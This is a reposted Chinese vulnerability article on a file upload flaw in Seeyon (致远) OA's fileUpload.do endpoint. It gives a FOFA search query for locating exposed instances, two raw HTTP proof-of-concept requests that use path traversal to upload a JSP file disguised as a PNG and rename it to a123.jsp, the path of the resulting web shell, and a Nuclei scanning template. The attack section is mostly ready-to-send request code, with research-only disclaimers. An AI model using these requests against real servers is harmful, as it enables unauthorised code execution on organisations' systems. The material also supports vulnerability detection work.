0x00 阅读须知
免责声明:本文提供的信息和方法仅供网络安全专业人员用于教学和研究目的,不得用于任何非法活动。读者若使用文章内容从事任何未授权的行为,需自行承担所有法律责任和后果。本公众号及作者对由此引起的任何直接或间接损失不负责任。请严格遵守相关法律法规。
0x01 漏洞简介
致远OA是一款企业级办公自动化软件,提供了办公流程管理、文档管理、协同办公、知识管理等功能。它可以帮助企业实现信息化办公,提高工作效率和协同能力。该系统fileUpload.do存在文件上传漏洞。
0x02 漏洞详情
fofa:app="FE-协作平台" || title="协同管理软件 V5.6SP1"
Poc:
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1Host:Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Type: multipart/form-data; boundary=skdHHhNHjhnUgerSexsksboundaryUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="type"--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="extensions"png--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="applicationCategory"--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="destDirectory"--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="destFilename"--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="maxSize"--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="isEncrypt"false--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="file1"; filename="1.png"Content-Type: Content-Type: application/pdf<% out.println("hello test");%>--skdHHhNHjhnUgerSexsksboundary--
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1Host:Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)method=uploadMenuIcon&fileid=7866719621757354789&filename=a123.jsp
路径:/seeyon/main/menuIcon/a123.jsp
0x03 Nuclie
id: zhiyuanOA-fileUpload-fileuploadinfo:name: zhiyuanOA-fileUpload-fileuploadauthor: unknownseverity: highdescription: 致远互联 OA fileUpload.do 文件上传漏洞tags: zhiyuanOA,fileuploadhttp:raw:|POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1Host: {{Hostname}}Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2: multipart/form-data; boundary=skdHHhNHjhnUgerSexsksboundary: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30): 854--skdHHhNHjhnUgerSexsksboundary: form-data; name="type"--skdHHhNHjhnUgerSexsksboundary: form-data; name="extensions"png--skdHHhNHjhnUgerSexsksboundary: form-data; name="applicationCategory"--skdHHhNHjhnUgerSexsksboundary: form-data; name="destDirectory"--skdHHhNHjhnUgerSexsksboundary: form-data; name="destFilename"--skdHHhNHjhnUgerSexsksboundary: form-data; name="maxSize"--skdHHhNHjhnUgerSexsksboundary: form-data; name="isEncrypt"false--skdHHhNHjhnUgerSexsksboundary: form-data; name="file1"; filename="AdsjkHjhggc_adf.png": Content-Type: application/pdfout.println("hello test");%>--skdHHhNHjhnUgerSexsksboundary--: andmatchers:type: wordpart: bodywords:AdsjkHjhggc_adf.pngtype: wordpart: bodywords:fileurls=fileurlstype: statusstatus:- 200
原文始发于微信公众号(贫僧法号云空):致远互联 OA fileUpload.do 文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论